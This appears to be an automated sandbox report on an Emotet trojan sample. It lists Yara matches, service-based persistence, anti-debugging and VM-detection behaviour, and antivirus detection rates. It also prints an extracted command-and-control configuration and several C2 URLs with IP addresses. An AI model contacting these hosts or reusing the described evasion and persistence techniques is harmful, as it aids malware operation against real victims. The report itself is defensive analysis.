Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E61F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,3_2_00E61F75

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000002.00000002.1238492683.0000000000610000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000000.00000002.1208704622.0000000002201000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000002.00000002.1239429666.0000000000EB1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000001.00000002.1244085000.0000000000621000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000000.00000002.1207968367.0000000000470000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000003.00000002.2915763997.0000000000E50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000003.00000002.2915815200.0000000000E61000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000001.00000002.1244031414.0000000000610000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Contains functionality to call native functionsShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_00401E27 NtAllocateVirtualMemory,0_2_00401E27
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 1_2_00401E27 NtAllocateVirtualMemory,1_2_00401E27
Contains functionality to delete servicesShow sources
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E6CFE1 GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle,3_2_00E6CFE1
Contains functionality to launch a process as a different userShow sources
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E61D2B CreateProcessAsUserW,CreateProcessW,3_2_00E61D2B
Creates files inside the system directoryShow sources
Source: C:\Windows\SysWOW64\rdsmethods.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
Deletes files inside the Windows folderShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeFile deleted: C:\Windows\SysWOW64\rdsmethods.exe:Zone.IdentifierJump to behavior
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_0040128B0_2_0040128B
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_0042560D0_2_0042560D
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_004197810_2_00419781
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_00420E800_2_00420E80
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_00414F9F0_2_00414F9F
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_022037A50_2_022037A5
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_022037A90_2_022037A9
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_02202F820_2_02202F82
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 1_2_0040128B1_2_0040128B
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 1_2_0042560D1_2_0042560D
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 1_2_004197811_2_00419781
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 1_2_00420E801_2_00420E80
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 1_2_00414F9F1_2_00414F9F
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 2_2_006130E42_2_006130E4
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 2_2_006130E82_2_006130E8
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 2_2_006128C12_2_006128C1
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 2_2_00EB37A92_2_00EB37A9
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 2_2_00EB37A52_2_00EB37A5
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 2_2_00EB2F822_2_00EB2F82
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E530E43_2_00E530E4
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E530E83_2_00E530E8
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E528C13_2_00E528C1
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E637A53_2_00E637A5
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E637A93_2_00E637A9
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E62F823_2_00E62F82
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: String function: 0040A450 appears 54 times
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: String function: 004122AC appears 104 times
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: String function: 00409710 appears 62 times
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: String function: 0042722B appears 46 times
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: String function: 00406780 appears 86 times
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: String function: 0042AEE1 appears 42 times
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: String function: 004131CC appears 322 times
PE file contains strange resourcesShow sources
Source: pM54o4Q47b.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version infoShow sources
Source: pM54o4Q47b.exe, 00000000.00000000.1197666359.0000000000457000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMSADODLG.EXE vs pM54o4Q47b.exe
Source: pM54o4Q47b.exe, 00000001.00000000.1207352553.0000000000457000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMSADODLG.EXE vs pM54o4Q47b.exe
Source: pM54o4Q47b.exe, 00000001.00000002.1248947711.0000000002EB0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs pM54o4Q47b.exe
Source: pM54o4Q47b.exe, 00000001.00000002.1248947711.0000000002EB0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs pM54o4Q47b.exe
Source: pM54o4Q47b.exe, 00000001.00000002.1248171819.0000000002DB0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs pM54o4Q47b.exe
Source: pM54o4Q47b.exeBinary or memory string: OriginalFilenameMSADODLG.EXE vs pM54o4Q47b.exe
Tries to load missing DLLsShow sources
Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
Yara signature matchShow sources
Source: 00000002.00000002.1238492683.0000000000610000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000000.00000002.1208704622.0000000002201000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000002.00000002.1239429666.0000000000EB1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000001.00000002.1244085000.0000000000621000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000000.00000002.1207968367.0000000000470000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000003.00000002.2915763997.0000000000E50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000003.00000002.2915815200.0000000000E61000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000001.00000002.1244031414.0000000000610000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Classification labelShow sources
Source: classification engineClassification label: mal100.bank.troj.evad.winEXE@7/1@1/13
Contains functionality to create servicesShow sources
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,3_2_00E6D0B1
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_02201943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_02201943
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_0040A300 CoCreateInstance,OleRun,CoCreateInstance,0_2_0040A300
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_00426769 FindResourceA,LoadResource,LockResource,0_2_00426769
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E6D0B1 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,3_2_00E6D0B1
Creates files inside the user directoryShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
Creates mutexesShow sources
Source: C:\Windows\SysWOW64\rdsmethods.exeMutant created: \BaseNamedObjects\Global\I4E4815C3
PE file has an executable .text section and no other executable sectionShow sources
Source: pM54o4Q47b.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini filesShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample is known by AntivirusShow sources
Source: pM54o4Q47b.exeVirustotal: Detection: 76%
Source: pM54o4Q47b.exeReversingLabs: Detection: 80%
Sample requires command line parameters (based on API chain)Show sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_0-24584
Source: C:\Windows\SysWOW64\rdsmethods.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_2-4590
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\pM54o4Q47b.exe 'C:\Users\user\Desktop\pM54o4Q47b.exe'
Source: unknownProcess created: C:\Users\user\Desktop\pM54o4Q47b.exe --3386359c
Source: unknownProcess created: C:\Windows\SysWOW64\rdsmethods.exe C:\Windows\SysWOW64\rdsmethods.exe
Source: unknownProcess created: C:\Windows\SysWOW64\rdsmethods.exe --1fb03223
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wusvcs -p
Source: C:\Users\user\Desktop\pM54o4Q47b.exeProcess created: C:\Users\user\Desktop\pM54o4Q47b.exe --3386359cJump to behavior
Source: C:\Windows\SysWOW64\rdsmethods.exeProcess created: C:\Windows\SysWOW64\rdsmethods.exe --1fb03223Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_00401D1C LoadLibraryW,GetProcAddress,0_2_00401D1C
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_004131CC push eax; ret 0_2_004131EA
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_00412460 push eax; ret 0_2_0041248E
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 1_2_004131CC push eax; ret 1_2_004131EA
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 1_2_00412460 push eax; ret 1_2_0041248E
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 2_2_0061E466 push 0000000Bh; iretd 2_2_0061E468
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 2_2_0061EA4A push es; iretd 2_2_0061EA4C
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 2_2_0061EB69 push es; iretd 2_2_0061EB80
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 2_2_0061EBDB push es; iretd 2_2_0061EBF8
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E5E466 push 0000000Bh; iretd 3_2_00E5E468
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E5EA4A push es; iretd 3_2_00E5EA4C
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E5EBDB push es; iretd 3_2_00E5EBF8
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E5EB69 push es; iretd 3_2_00E5EB80

Persistence and Installation Behavior:

barindex
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\Windows\SysWOW64\rdsmethods.exeExecutable created and started: C:\Windows\SysWOW64\rdsmethods.exeJump to behavior
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exePE file moved: C:\Windows\SysWOW64\rdsmethods.exeJump to behavior

Boot Survival:

barindex
Contains functionality to start windows servicesShow sources
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E6D0B1 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,3_2_00E6D0B1

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeFile opened: C:\Windows\SysWOW64\rdsmethods.exe:Zone.Identifier read attributes | deleteJump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)Show sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_0040B278 IsIconic,GetWindowPlacement,GetWindowRect,0_2_0040B278
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_0040A5E0 IsIconic,0_2_0040A5E0
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_0041E630 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC,0_2_0041E630
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_0041EDE0 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA,0_2_0041EDE0
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 1_2_0040B278 IsIconic,GetWindowPlacement,GetWindowRect,1_2_0040B278
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 1_2_0040A5E0 IsIconic,1_2_0040A5E0
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 1_2_0041E630 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC,1_2_0041E630
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 1_2_0041EDE0 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA,1_2_0041EDE0
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\pM54o4Q47b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\pM54o4Q47b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\pM54o4Q47b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rdsmethods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rdsmethods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rdsmethods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rdsmethods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rdsmethods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rdsmethods.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Found evasive API chain (may stop execution after checking mutex)Show sources
Source: C:\Windows\SysWOW64\rdsmethods.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_2-4688
Query firmware table information (likely to detect VMs)Show sources
Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
Contains functionality to enumerate running servicesShow sources
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,3_2_00E6CE15
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeAPI coverage: 3.1 %
Source: C:\Users\user\Desktop\pM54o4Q47b.exeAPI coverage: 2.6 %
Source: C:\Windows\SysWOW64\rdsmethods.exeAPI coverage: 9.8 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\svchost.exe TID: 4816Thread sleep time: -60000s >= -30000sJump to behavior
Queries disk information (often used to detect virtual machines)Show sources
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Checks the free space of harddrivesShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_00427F56 GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,0_2_00427F56
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 1_2_00427F56 GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,1_2_00427F56
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: svchost.exe, 00000008.00000002.1535306523.0000017882460000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000008.00000002.1534999851.0000017881EB6000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000008.00000002.1535306523.0000017882460000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000008.00000002.1535306523.0000017882460000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000008.00000002.1535306523.0000017882460000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Program exit pointsShow sources
Source: C:\Windows\SysWOW64\rdsmethods.exeAPI call chain: ExitProcess graph end nodegraph_2-4620
Source: C:\Windows\SysWOW64\rdsmethods.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rdsmethods.exeAPI call chain: ExitProcess graph end node
Queries a list of all running processesShow sources
Source: C:\Windows\SysWOW64\rdsmethods.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_00401D1C LoadLibraryW,GetProcAddress,0_2_00401D1C
Contains functionality to read the PEBShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_0040107E mov eax, dword ptr fs:[00000030h]0_2_0040107E
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_022012CD mov eax, dword ptr fs:[00000030h]0_2_022012CD
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_02201E04 mov eax, dword ptr fs:[00000030h]0_2_02201E04
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 1_2_0040107E mov eax, dword ptr fs:[00000030h]1_2_0040107E
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 2_2_00610467 mov eax, dword ptr fs:[00000030h]2_2_00610467
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 2_2_00610C0C mov eax, dword ptr fs:[00000030h]2_2_00610C0C
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 2_2_00611743 mov eax, dword ptr fs:[00000030h]2_2_00611743
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 2_2_00EB12CD mov eax, dword ptr fs:[00000030h]2_2_00EB12CD
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 2_2_00EB1E04 mov eax, dword ptr fs:[00000030h]2_2_00EB1E04
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E50467 mov eax, dword ptr fs:[00000030h]3_2_00E50467
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E50C0C mov eax, dword ptr fs:[00000030h]3_2_00E50C0C
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E51743 mov eax, dword ptr fs:[00000030h]3_2_00E51743
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E612CD mov eax, dword ptr fs:[00000030h]3_2_00E612CD
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E61E04 mov eax, dword ptr fs:[00000030h]3_2_00E61E04
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_022014F2 GetProcessHeap,RtlAllocateHeap,0_2_022014F2
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_00416EB6 SetUnhandledExceptionFilter,0_2_00416EB6
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_00416EC8 SetUnhandledExceptionFilter,0_2_00416EC8
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 1_2_00416EB6 SetUnhandledExceptionFilter,1_2_00416EB6
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 1_2_00416EC8 SetUnhandledExceptionFilter,1_2_00416EC8

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_0220D838 cpuid 0_2_0220D838
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rdsmethods.exeQueries volume information: C:\ VolumeInformationJump to behavior
Contains functionality to query time zone informationShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_004177F5 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_004177F5
Contains functionality to query windows versionShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_0042B7F5 GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA,0_2_0042B7F5
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected EmotetShow sources
Source: Yara matchFile source: 00000002.00000002.1238492683.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.1239429666.0000000000EB1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000001.00000002.1244085000.0000000000621000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.1207968367.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.2915763997.0000000000E50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.2915815200.0000000000E61000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000001.00000002.1244031414.0000000000610000.00000040.00000001.sdmp, type: MEMORY

Malware Configuration

Threatname: Emotet

{"C2 list": ["50.116.86.205/srvc"]}

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Simulations

Behavior and APIs

TimeTypeDescription
09:37:17API Interceptor2x Sleep call for process: svchost.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
pM54o4Q47b.exe76%VirustotalBrowse
pM54o4Q47b.exe81%ReversingLabsWin32.Trojan.Emotet
pM54o4Q47b.exe100%AviraTR/AD.Emotet.dcjla

Dropped Files

No Antivirus matches

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
0.2.pM54o4Q47b.exe.400000.0.unpack100%AviraHEUR/AGEN.1045699Download File
3.2.rdsmethods.exe.400000.0.unpack100%AviraHEUR/AGEN.1045699Download File
0.0.pM54o4Q47b.exe.400000.0.unpack100%AviraTR/AD.Emotet.dcjlaDownload File
1.0.pM54o4Q47b.exe.400000.0.unpack100%AviraTR/AD.Emotet.dcjlaDownload File
3.0.rdsmethods.exe.400000.0.unpack100%AviraTR/AD.Emotet.dcjlaDownload File
2.0.rdsmethods.exe.400000.0.unpack100%AviraTR/AD.Emotet.dcjlaDownload File
2.2.rdsmethods.exe.400000.0.unpack100%AviraHEUR/AGEN.1045699Download File
1.2.pM54o4Q47b.exe.400000.0.unpack100%AviraHEUR/AGEN.1045699Download File

Domains

SourceDetectionScannerLabelLink
cdn.onenote.net1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://206.81.10.215:8080/scripts/rtm/xian/0%Avira URL Cloudsafe
http://wellformedweb.org/CommentAPI/1%VirustotalBrowse
http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
http://206.189.112.148:8080/pnp/6%VirustotalBrowse
http://206.189.112.148:8080/pnp/0%Avira URL Cloudsafe
http://51.68.220.244:8080/rtm/teapot/0%Avira URL Cloudsafe
http://50.116.86.205/srvc/enabled/xian/0%Avira URL Cloudsafe
http://50.116.86.205:8080/srvc/enabled/xian/0%Avira URL Cloudsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.1238492683.0000000000610000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000002.00000002.1238492683.0000000000610000.00000040.00000001.sdmpEmotetEmotet Payloadkevoreilly
    • 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 0C 02 41 00 85 C0
    • 0x5a13:$snippet6: 33 C0 21 05 4C 25 41 00 A3 48 25 41 00 39 05 70 F3 40 00 74 18 40 A3 48 25 41 00 83 3C C5 70 F3 ...
    00000000.00000002.1208704622.0000000002201000.00000020.00000001.sdmpEmotetEmotet Payloadkevoreilly
    • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 0C 02 21 02 85 C0
